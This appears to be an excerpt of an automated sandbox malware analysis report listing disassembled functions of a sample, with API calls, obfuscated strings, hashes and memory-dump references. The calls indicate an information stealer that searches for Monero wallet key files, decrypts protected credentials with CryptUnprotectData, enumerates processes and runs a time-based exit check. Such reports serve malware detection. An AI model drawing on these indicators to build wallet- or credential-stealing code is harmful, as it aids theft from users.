                              • String ID: #Y{o$CD6}$Cp_[$Pkm$^8W $b{Z$-Z
                              • API String ID: 0-1148734220
                              • Opcode ID: 922de5545d049468175c30fad4990fb7ca71a32da222e2ae79faad4121082066
                              • Instruction ID: bdbd98a25674a96405b71936d66fb48ba0a21229d4d3069f21e0d1c5cdb5fe13
                              • Opcode Fuzzy Hash: 922de5545d049468175c30fad4990fb7ca71a32da222e2ae79faad4121082066
                              • Instruction Fuzzy Hash: 7DB2F6F3A0C2009FE3046E2DEC8567ABBEAEFD4720F16493DE6C4C7744EA7558058696
                              Function 0014E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00160D73), ref: 0014E4A2
                              • StrCmpCA.SHLWAPI(?,001614F8), ref: 0014E4F2
                              • StrCmpCA.SHLWAPI(?,001614FC), ref: 0014E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 178a3d3a22e04c997d82a96f483931aa579ff0ffc65bf5ff3e30f5d12c5f4f73
                              • Instruction ID: d7a3160beb44a35df8ef77c774e8217bca70d5212a788fc30b4f932c80f65e4d
                              • Opcode Fuzzy Hash: 178a3d3a22e04c997d82a96f483931aa579ff0ffc65bf5ff3e30f5d12c5f4f73
                              • Instruction Fuzzy Hash: FA123371990118DADB15FB60DC96EED7378BF64302F804299B91A9A091FF306F4DCB92
                              Function 00508924 Relevance: 9.1, Strings: 6, Instructions: 1604COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: w}$,Jm$<M+%$@[Oo$A:'{$QP.
                              • API String ID: 0-930614444
                              • Opcode ID: edb0722e64e320f2b612cf4c8c5e46ed38e68dbae2ffcf609b124f0d62d545db
                              • Instruction ID: ffa46bfe93bbef74129ea4bf01d47b2acb0fc754356b12af2ea39d9f39c10602
                              • Opcode Fuzzy Hash: edb0722e64e320f2b612cf4c8c5e46ed38e68dbae2ffcf609b124f0d62d545db
                              • Instruction Fuzzy Hash: FCB2F8F36082049FE304AE2DDC8567AFBE9EFD4720F1A493DEAC4C7744E63598058696
                              Function 0051C93F Relevance: 7.9, Strings: 5, Instructions: 1617COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: F.?_$J>?$PHm$^:y$t+D}
                              • API String ID: 0-2466709220
                              • Opcode ID: 8df6aa07e31c7abb7809efb28b4ad6a3b136b155d11d0ebab1269ff8521f0f09
                              • Instruction ID: 85630e2ab29d696f4b0dcdb0a81d25b74cfb04d94db44698c98ee47950ab489b
                              • Opcode Fuzzy Hash: 8df6aa07e31c7abb7809efb28b4ad6a3b136b155d11d0ebab1269ff8521f0f09
                              • Instruction Fuzzy Hash: 2EB218F3A082109FE3046E2DEC8567AFBE9EF94720F164A3DEAC4D3744E63558058697
                              Function 00516106 Relevance: 7.6, Strings: 5, Instructions: 1363COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: t]y$&sG$W};$hCk$l7
                              • API String ID: 0-3755676267
                              • Opcode ID: 9b6584f2d1da8b14cbbba441c87703884d849b12afbbfe5401ea5f193188ef5b
                              • Instruction ID: 0f692b0612b1e60ed063550565d656137fbdbf2db9462d1f8794af90c3ef7c40
                              • Opcode Fuzzy Hash: 9b6584f2d1da8b14cbbba441c87703884d849b12afbbfe5401ea5f193188ef5b
                              • Instruction Fuzzy Hash: 5F9205F3A082109FE704AE2DEC4567ABBE5EF94720F16493DEAC4C7744EA3598058793
                              Function 0014C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0014C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0014C87C
                              • lstrcat.KERNEL32(?,00160B46), ref: 0014C943
                              • lstrcat.KERNEL32(?,00160B47), ref: 0014C957
                              • lstrcat.KERNEL32(?,00160B4E), ref: 0014C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: ddce902649e426b21418b4a8dcd8280fef930999bb51afc999c4795d60c8a200
                              • Instruction ID: 83bad6f8a5c9326978972fcaeb9bb42f8359a7de2afc8c91eadb06a1e5fa475e
                              • Opcode Fuzzy Hash: ddce902649e426b21418b4a8dcd8280fef930999bb51afc999c4795d60c8a200
                              • Instruction Fuzzy Hash: 8E416FB590521AEFDB10DFA0DD89BFEF7B8BB48304F1041A9E509A6280D7745A84CF91
                              Function 0051B215 Relevance: 7.6, Strings: 5, Instructions: 1320COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Fy$J)wW$_}}o$`l2Y$t0{6
                              • API String ID: 0-2315511343
                              • Opcode ID: 51b1f26c67b5dc800bbddcd69e66d8939d9d9ee16fbf2210bfdbdbc77bd88ff8
                              • Instruction ID: 0b57d24b9dfc0ebb3f03559d14912c877df5e85d00cd1bc8a6c6b607b82e2b1b
                              • Opcode Fuzzy Hash: 51b1f26c67b5dc800bbddcd69e66d8939d9d9ee16fbf2210bfdbdbc77bd88ff8
                              • Instruction Fuzzy Hash: F192D2F390C210AFE304AE29EC8567ABBE5EF94720F16493DEAC4C7744EA3558448797
                              Function 00156920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0015696C
                              • sscanf.NTDLL ref: 00156999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001569B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001569C0
                              • ExitProcess.KERNEL32 ref: 001569DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: b6c8b054a36b06390497e576ab04e6f46626c6b2cdab332f8c95f677f324c1be
                              • Instruction ID: ae2b462a8a3d50a0da1929141267d3d26ef3f9099d6732bcf5619f55e8123ffe
                              • Opcode Fuzzy Hash: b6c8b054a36b06390497e576ab04e6f46626c6b2cdab332f8c95f677f324c1be
                              • Instruction Fuzzy Hash: 7F21E9B5D00208AFDF04EFE4D945AEEB7B9BF48301F44856AE416E7250EB345608CBA9
                              Function 00147240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0014724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00147254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00147281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001472A4
                              • LocalFree.KERNEL32(?), ref: 001472AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 1ea3869d5407b01d3c2f6dcc254d0712fe79a9eeec2b44a2fba219aa63bb9798
                              • Instruction ID: 1b697d9f5e35c13f5eac4e92ca19732689f490b86f02b66df718d552610606bf
                              • Opcode Fuzzy Hash: 1ea3869d5407b01d3c2f6dcc254d0712fe79a9eeec2b44a2fba219aa63bb9798
                              • Instruction Fuzzy Hash: 50010075A44308BBEB14DFD4CD45F9E77B8AB44700F104595FB05AA2C0D7B0AA008B65
                              Function 00159600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0015961E
                              • Process32First.KERNEL32(00160ACA,00000128), ref: 00159632
                              • Process32Next.KERNEL32(00160ACA,00000128), ref: 00159647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0015965C
                              • CloseHandle.KERNEL32(00160ACA), ref: 0015967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 49cb267fc93debf404c14d261d3e833641ddbd12529d08cea17bb0db9e719a60
                              • Instruction ID: 035e544cac885d123cbd0024af54b72a9415c986ea7442ec27d6dc3dc71a0a0d
                              • Opcode Fuzzy Hash: 49cb267fc93debf404c14d261d3e833641ddbd12529d08cea17bb0db9e719a60
                              • Instruction Fuzzy Hash: 7C011EB5A00308EBDB15DFA5DD58BEDBBF8EB48301F1041C9A9069B240E7349B48DF52
                              Function 0051E41C Relevance: 6.7, Strings: 4, Instructions: 1654COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 9$sz$Ez6N$R7wu$fI
                              • API String ID: 0-1351617252
                              • Opcode ID: 51f22538ddcf75b624d196a4c142cb99fd343910941c543defa448598d0a452d
                              • Instruction ID: 983d16eecb439ffaf178d1e2fd14e0dee40b03fe0a6a56fc7c2cc9699dad2662
                              • Opcode Fuzzy Hash: 51f22538ddcf75b624d196a4c142cb99fd343910941c543defa448598d0a452d
                              • Instruction Fuzzy Hash: 69B2F1F3A0C2149FE704AE2DEC8567ABBE9EF94720F16493DE6C4C3740EA3558418697
                              Function 00158EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00145184,40000001,00000000,00000000,?,00145184), ref: 00158EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 0ae0fc4edc70621f6728c693af43edcf90085a85da1995ba4caaa25f616dc388
